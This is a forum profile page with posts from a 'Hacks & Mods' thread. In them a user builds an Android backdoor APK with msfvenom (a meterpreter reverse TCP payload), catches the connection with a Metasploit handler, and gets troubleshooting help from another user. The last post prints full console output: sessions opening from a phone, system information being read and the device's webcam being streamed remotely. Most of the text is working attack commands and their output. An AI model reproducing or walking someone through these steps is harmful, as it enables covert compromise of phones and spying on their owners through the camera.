hackRecorded
-
Posts
5 -
Joined
-
Last visited
Posts posted by hackRecorded
-
-
5 hours ago, digip said:
What is the IP address of the device running Android? Looks like it has a session, have you typed "sessions" and then "sessions -i 1" assuming only one session, the first being the android device. if "192.168.43.1" is the gateway's IP, you may have to port forward or put your computer running metasploit, in a DMZ, but so long as the Android device is over wifi on the same subnet, then you should be ok. It's possible the attack runs, but isn't 100% vulnerable to what you're trying to do though. You might want to also add a filter for bad characters like x00,x0d,x0a, etc, to the binary in msfvenom, just to be safe.
Example:
-b '\x00\xFF'
this is what I need, my android device IP 192.168.43.1, it's theatering wifi to my macbook with IP 192.168.43.128.. so I run metasploit in my terminal.. I'll try your suggestion.. I will ask again if any further problem.. thank you master..
-
I just create sample for android backdoor it's call apkgue.apk, after I run on my phone (android) I stuck to the next step.. the meterpreter > doesn't show.. why? any help for me? thanks..
msf > ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk [*] exec: ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 8809 bytes msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.43.128 lhost => 192.168.43.128 msf exploit(handler) > set lport 3344 lport => 3344 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (android/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.43.128 yes The listen address LPORT 3344 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.43.128:3344 msf exploit(handler) > [*] Sending stage (69089 bytes) to 192.168.43.1 [*] Meterpreter session 1 opened (192.168.43.128:3344 -> 192.168.43.1:44411) at 2017-10-19 23:02:02 +0700
-
2 minutes ago, hackRecorded said:
I just create sample for android backdoor it's call apkgue.apk, after I run on my phone (android) I stuck to the next step.. the meterpreter > doesn't show.. why? any help for me? thanks..
msf > ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk [*] exec: ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 8809 bytes msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.43.128 lhost => 192.168.43.128 msf exploit(handler) > set lport 3344 lport => 3344 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (android/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.43.128 yes The listen address LPORT 3344 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.43.128:3344 msf exploit(handler) > [*] Sending stage (69089 bytes) to 192.168.43.1 [*] Meterpreter session 1 opened (192.168.43.128:3344 -> 192.168.43.1:44411) at 2017-10-19 23:02:02 +0700
I forgot to active notification of replies
-
I just create sample for android backdoor it's call apkgue.apk, after I run on my phone (android) I stuck to the next step.. the meterpreter > doesn't show.. why? any help for me? thanks..
msf > ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk [*] exec: ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 8809 bytes msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.43.128 lhost => 192.168.43.128 msf exploit(handler) > set lport 3344 lport => 3344 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (android/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.43.128 yes The listen address LPORT 3344 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.43.128:3344 msf exploit(handler) > [*] Sending stage (69089 bytes) to 192.168.43.1 [*] Meterpreter session 1 opened (192.168.43.128:3344 -> 192.168.43.1:44411) at 2017-10-19 23:02:02 +0700
meterpreter stuck on OSX metasploit
in Hacks & Mods
Posted
solved.. I try to type : session -i 6
msf > ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.8.101 LPORT=4444 R > apkgue6666.apk
[*] exec: ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.8.101 LPORT=4444 R > apkgue6666.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8812 bytes
msf > use exploit multi/handler
[-] Failed to load module: exploit
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.186.8.101
LHOST => 192.186.8.101
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Exploit running as background job 2.
[-] Handler failed to bind to 192.186.8.101:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
msf exploit(handler) > [*] Sending stage (69089 bytes) to 192.168.8.105
[*] Meterpreter session 5 opened (192.168.8.101:4444 -> 192.168.8.105:53588) at 2017-10-20 16:08:14 +0700
[*] Sending stage (69089 bytes) to 192.168.8.105
[*] Meterpreter session 6 opened (192.168.8.101:4444 -> 192.168.8.105:38842) at 2017-10-20 16:09:17 +0700
Interrupt: use the 'exit' command to quit
msf exploit(handler) > exit
[*] You have active sessions open, to exit anyway type "exit -y"
msf exploit(handler) > sessions -i 1
[-] Invalid session identifier: 1
msf exploit(handler) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
5 meterpreter dalvik/android u0_a347 @ localhost 192.168.8.101:4444 -> 192.168.8.105:53588 (192.168.8.105)
6 meterpreter dalvik/android u0_a347 @ localhost 192.168.8.101:4444 -> 192.168.8.105:38842 (192.168.8.105)
msf exploit(handler) > sessions -i 6
[*] Starting interaction with 6...
meterpreter > sysinfo
Computer : localhost
OS : Android 6.0.1 - Linux 3.4.0-perf-gc14c2d5 (armv7l)
Meterpreter : dalvik/android
meterpreter > webcam_stream -i 2
[*] Starting...
[*] Preparing player...
[*] Opening player at: VLMpJIsx.html
[*] Streaming...